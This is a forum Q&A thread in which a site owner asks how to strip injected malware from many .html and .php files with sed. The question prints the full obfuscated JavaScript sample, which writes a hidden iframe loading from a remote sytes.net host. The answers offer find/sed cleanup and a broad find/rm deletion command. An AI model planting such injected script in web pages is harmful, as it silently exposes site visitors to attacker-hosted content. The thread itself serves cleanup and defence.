# How can I remove malware code in multiple files with sed?

Tags: linux, grep, sed

I've this malware code in so many .html and .php files on the server. I need to remove them using

- `sed -i expression`
- search all files under directory `/home/`
- find infected files
- remove the code by replacing it with a white space

  var usikwseoomg = 'PaBUTyjaZYg3cPaBUTyjaZYg69PaBUTyjaZYg66';var nimbchnzujc = 'PaBUTyjaZYg72';var szwtgmqzekr = 'PaBUTyjaZYg61PaBUTyjaZYg6dPaBUTyjaZYg65PaBUTyjaZYg20PaBUTyjaZYg6ePaBUTyjaZYg61PaBUTyjaZYg6dPaBUTyjaZYg65PaBUTyjaZYg3dPaBUTyjaZYg22';var yvofadunjkv = 'PaBUTyjaZYg6dPaBUTyjaZYg67PaBUTyjaZYg79PaBUTyjaZYg65PaBUTyjaZYg64PaBUTyjaZYg61PaBUTyjaZYg67PaBUTyjaZYg70PaBUTyjaZYg7aPaBUTyjaZYg63PaBUTyjaZYg76';var ylydzxyjaci = 'PaBUTyjaZYg22PaBUTyjaZYg20PaBUTyjaZYg77PaBUTyjaZYg69PaBUTyjaZYg64PaBUTyjaZYg74PaBUTyjaZYg68PaBUTyjaZYg3dPaBUTyjaZYg22PaBUTyjaZYg31PaBUTyjaZYg22PaBUTyjaZYg20PaBUTyjaZYg68PaBUTyjaZYg65PaBUTyjaZYg69PaBUTyjaZYg67PaBUTyjaZYg68PaBUTyjaZYg74PaBUTyjaZYg3dPaBUTyjaZYg22PaBUTyjaZYg30PaBUTyjaZYg22';var xwojmnoxfbs = 'PaBUTyjaZYg20PaBUTyjaZYg73PaBUTyjaZYg72PaBUTyjaZYg63PaBUTyjaZYg3dPaBUTyjaZYg22';var mgsybgilcfx = 'PaBUTyjaZYg68PaBUTyjaZYg74PaBUTyjaZYg74PaBUTyjaZYg70PaBUTyjaZYg3aPaBUTyjaZYg2fPaBUTyjaZYg2f';var nixyhgyjouf = 'koska.sytes.net/phl/logs/index.php';var nesrtqwuirb = 'PaBUTyjaZYg22PaBUTyjaZYg20PaBUTyjaZYg6dPaBUTyjaZYg61PaBUTyjaZYg72PaBUTyjaZYg67PaBUTyjaZYg69PaBUTyjaZYg6ePaBUTyjaZYg77PaBUTyjaZYg69PaBUTyjaZYg64PaBUTyjaZYg74PaBUTyjaZYg68PaBUTyjaZYg3dPaBUTyjaZYg22PaBUTyjaZYg31PaBUTyjaZYg22PaBUTyjaZYg20PaBUTyjaZYg6dPaBUTyjaZYg61PaBUTyjaZYg72PaBUTyjaZYg67PaBUTyjaZYg69PaBUTyjaZYg6ePaBUTyjaZYg68PaBUTyjaZYg65PaBUTyjaZYg69PaBUTyjaZYg67PaBUTyjaZYg68PaBUTyjaZYg74PaBUTyjaZYg3dPaBUTyjaZYg22PaBUTyjaZYg30PaBUTyjaZYg22PaBUTyjaZYg20PaBUTyjaZYg74PaBUTyjaZYg69PaBUTyjaZYg74PaBUTyjaZYg6cPaBUTyjaZYg65PaBUTyjaZYg3dPaBUTyjaZYg22';var rqchyojemkn = 'PaBUTyjaZYg6dPaBUTyjaZYg67PaBUTyjaZYg79PaBUTyjaZYg65PaBUTyjaZYg64PaBUTyjaZYg61PaBUTyjaZYg67PaBUTyjaZYg70PaBUTyjaZYg7aPaBUTyjaZYg63PaBUTyjaZYg76';var niupgeebkhf = 'PaBUTyjaZYg22PaBUTyjaZYg20PaBUTyjaZYg73PaBUTyjaZYg63PaBUTyjaZYg72PaBUTyjaZYg6fPaBUTyjaZYg6cPaBUTyjaZYg6cPaBUTyjaZYg69PaBUTyjaZYg6ePaBUTyjaZYg67PaBUTyjaZYg3dPaBUTyjaZYg22PaBUTyjaZYg6ePaBUTyjaZYg6fPaBUTyjaZYg22PaBUTyjaZYg20PaBUTyjaZYg62PaBUTyjaZYg6fPaBUTyjaZYg72PaBUTyjaZYg64PaBUTyjaZYg65PaBUTyjaZYg72PaBUTyjaZYg3dPaBUTyjaZYg22PaBUTyjaZYg30PaBUTyjaZYg22PaBUTyjaZYg20PaBUTyjaZYg66PaBUTyjaZYg72PaBUTyjaZYg61PaBUTyjaZYg6dPaBUTyjaZYg65PaBUTyjaZYg62PaBUTyjaZYg6fPaBUTyjaZYg72PaBUTyjaZYg64PaBUTyjaZYg65PaBUTyjaZYg72PaBUTyjaZYg3dPaBUTyjaZYg22PaBUTyjaZYg30PaBUTyjaZYg22PaBUTyjaZYg3e';var yyzsvtbnudd = 'PaBUTyjaZYg3cPaBUTyjaZYg2fPaBUTyjaZYg69PaBUTyjaZYg66';var tlclvgxfthn = 'PaBUTyjaZYg72PaBUTyjaZYg61';var zxttbudjafh = 'PaBUTyjaZYg6dPaBUTyjaZYg65PaBUTyjaZYg3e';var yydszqnduko = new Array();yydszqnduko[0]=new Array(usikwseoomg+nimbchnzujc+szwtgmqzekr+yvofadunjkv+ylydzxyjaci+xwojmnoxfbs+mgsybgilcfx+nixyhgyjouf+nesrtqwuirb+rqchyojemkn+niupgeebkhf+yyzsvtbnudd+tlclvgxfthn+zxttbudjafh);document['PaBUTyjaZYgwPaBUTyjaZYgrPaBUTyjaZYgiPaBUTyjaZYgtPaBUTyjaZYgePaBUTyjaZYg'.replace(/PaBUTyjaZYg/g,'')](window['PaBUTyjaZYguPaBUTyjaZYgnPaBUTyjaZYgePaBUTyjaZYgsPaBUTyjaZYgcPaBUTyjaZYgaPaBUTyjaZYgpPaBUTyjaZYgePaBUTyjaZYg'.replace(/PaBUTyjaZYg/g,'')](yydszqnduko.toString().replace(/PaBUTyjaZYg/g,'%')));

Comment: I would agree that it is malware. Creating an iframe named "mgyedagpzcv"(height of 0) and pulling the src from a subdomain of sytes.net trips too many red flags in my book. And that they've gone to such lengths to hide what they're doing doubles the number of flags tripped.

Answer (score 4, accepted):

I think this could do it:

```
find /home \( -name "*.html" -o -name "*.php" \) -exec sed -i.bak 's/<script.*PaBUTyjaZYg.*script>//g' \{\} \;
```

From the comment "to delete all files has numbers in thier name and extension .php"

```
find /home -name "*[0-9]*.php" -exec rm \{\} \;
```

But first, run it with echo instead of rm, to make sure you don't delete something you don't want to delete.

Comment: great , and what if i want to delete all files has numbers in thier name and extension .php how to perform this ?

Answer (score 12):

I would say that a much better/safer solution would be to restores those files from a clean backup.

Comment: And to fix the entry point.